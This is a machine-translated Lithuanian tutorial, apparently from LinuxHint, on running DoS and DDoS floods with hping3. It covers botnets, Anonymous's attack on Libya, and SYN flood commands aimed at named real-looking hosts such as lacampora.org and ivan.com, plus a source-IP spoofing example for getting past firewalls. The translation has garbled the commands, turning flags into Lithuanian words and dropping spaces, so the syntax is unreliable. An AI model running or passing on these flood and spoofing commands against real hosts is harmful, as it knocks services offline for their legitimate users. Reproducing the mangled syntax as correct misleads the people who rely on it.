hping3 potvynių ddos

Hping3 Flood Ddos



Ši pamoka skirta DDOS (Distributed Denial of Service) atakoms naudojant įrankį hping3. Jei jau esate susipažinę su DOS (Denial of Service) ir DDOS atakomis, galite toliau skaityti iš praktinių hping3 instrukcijų, kitaip rekomenduojama sužinoti, kaip šios atakos veikia.

DOS atakos


Paslaugų atsisakymo (DOS) ataka yra labai paprastas būdas paneigti prieigą prie paslaugų (todėl tai vadinama atsisakymo teikti paslaugomis ataka). Ši ataka susideda iš tikslo perkrovimo negabaritiniais paketais arba dideliu jų kiekiu.







Nors šią ataką labai lengva įvykdyti, ji nepažeidžia tikslo informacijos ar privatumo, ji nėra skvarbi ataka ir siekiama tik užkirsti kelią patekti į taikinį.
Siunčiant paketų kiekį, taikinys negali susidoroti su užpuolikais, kurie neleidžia serveriui aptarnauti teisėtų vartotojų.



DOS atakos vykdomos iš vieno įrenginio, todėl jas lengva sustabdyti užblokavus užpuoliko IP, tačiau užpuolikas gali pakeisti ir net suklastoti (klonuoti) tikslinį IP adresą, tačiau ugniasienėms nėra sunku susidoroti su tokiomis atakomis , priešingai nei atsitinka su DDOS atakomis.



DDOS atakos

Paskirstytas paslaugų atsisakymo išpuolis (DDOS) yra panašus į DOS ataką, tačiau vykdomas iš skirtingų mazgų (arba skirtingų užpuolikų) vienu metu. Paprastai DDOS atakas vykdo robotų tinklai. Robotiniai tinklai yra automatiniai scenarijai arba programos, užkrėsiančios kompiuterius atlikti automatizuotą užduotį (šiuo atveju DDOS ataką). Įsilaužėlis gali sukurti robotų tinklą ir užkrėsti daugelį kompiuterių, iš kurių botnetai pradės DOS atakas, tai, kad daugelis robotų tinklų vienu metu šaudo, paverčia DOS ataką DDOS ataka (todėl ji vadinama paskirstyta).





Žinoma, yra išimčių, kai DDOS atakas įvykdė tikri užpuolikai, pavyzdžiui, anoniminių įsilaužėlių grupė, kurią integravo tūkstančiai žmonių visame pasaulyje, labai dažnai naudojo šią techniką dėl jos lengvo įgyvendinimo (reikėjo tik savanorių, kurie pasidalino savo priežastimi), pavyzdžiui, anonimas paliko Gaddafi Libijos vyriausybę visiškai atjungtą per invaziją, o Libijos valstybė liko be gynybos prieš tūkstančius užpuolikų iš viso pasaulio.

Šio tipo atakoms, kai jos vykdomos iš daugelio skirtingų mazgų, labai sunku užkirsti kelią ir jas sustabdyti, o joms paprastai reikia specialios aparatūros, nes ugniasienės ir gynybinės programos nėra pasirengusios vienu metu susidoroti su tūkstančiais užpuolikų. Taip nėra „hping3“ atveju, dauguma atakų, įvykdytų naudojant šį įrankį, bus užblokuoti gynybiniais įrenginiais ar programine įranga, tačiau tai naudinga vietiniuose tinkluose arba prieš prastai apsaugotus taikinius.



Apie hping3

Įrankis hping3 leidžia siųsti manipuliuotus paketus. Šis įrankis leidžia valdyti paketų dydį, kiekį ir suskaidymą, siekiant perkrauti tikslą ir apeiti arba užpulti užkardas. „Hping3“ gali būti naudingas saugumo ar galimybių testavimo tikslais, naudodami jį galite patikrinti ugniasienių efektyvumą ir tai, ar serveris gali apdoroti didelį paketų kiekį. Žemiau rasite instrukcijas, kaip naudoti hping3 saugumo bandymų tikslais.

Darbo su DDOS atakomis pradžia naudojant hping3:

„Debian“ ir pagrindiniuose „Linux“ platinimuose galite įdiegti „hping3“ paleisdami:

#tinkamasdiegtihping3-ir

Paprasta DOS (ne DDOS) ataka būtų tokia:

#sudohping3-S -potvynis -V -p 80170.155.9.185

Kur:
sudo: suteikia reikiamas privilegijas paleisti hping3.
hping3:
skambina hping3 programa.
-S: nurodo SYN paketus.
- potvynis: fotografuokite savo nuožiūra, atsakymai bus ignoruojami (todėl atsakymai nebus rodomi), o paketai bus išsiųsti kuo greičiau.
-V: Daugžodžiavimas.
-p 80: prievadą 80, galite pakeisti šį numerį paslaugai, kurią norite užpulti.
170.155.9.185: tikslinis IP.

Potvynis naudojant SYN paketus prieš 80 prievadą:

Šis pavyzdys vaizduoja SYN ataką prieš lacampora.org:

#sudohping3 lacampora.org-q -n -d 120 -S -p 80 -potvynis -ir šaltinis

Kur:
Lacampora.org: yra taikinys
-q: trumpas išėjimas
-n: rodyti tikslinį IP, o ne pagrindinį kompiuterį.
-d 120: nustatyti paketo dydį
-ir šaltinis: paslėpti IP adresą.

Šis pavyzdys rodo kitą galimą potvynio pavyzdį:

SYN potvynis prieš 80 prievadą:

#sudohping3-ir šaltinisivan.com-S -q -p 80 -potvynis

Naudodami „hping3“ taip pat galite atakuoti savo taikinius naudodami suklastotą IP, kad aplenktumėte užkardą, netgi galite klonuoti savo tikslinį IP arba bet kurį jums žinomą leistiną adresą (tai galite pasiekti, pavyzdžiui, naudodami „Nmap“ arba „sniffer“, kad įsiklausytumėte jungtys).

Sintaksė būtų tokia:

#sudohping3 <FAKE IP> <taikinys> -S -q -p 80 -greičiau -c2

Šiame praktiniame pavyzdyje ataka atrodytų:

#sudohping3190.0.175.100 190.0.175.100-S -q -p 80 -greičiau -c2

Tikiuosi, kad jums buvo naudinga ši „hping3“ pamoka. Toliau sekite „LinuxHint“, kad gautumėte daugiau patarimų ir atnaujinimų apie „Linux“ ir tinklus.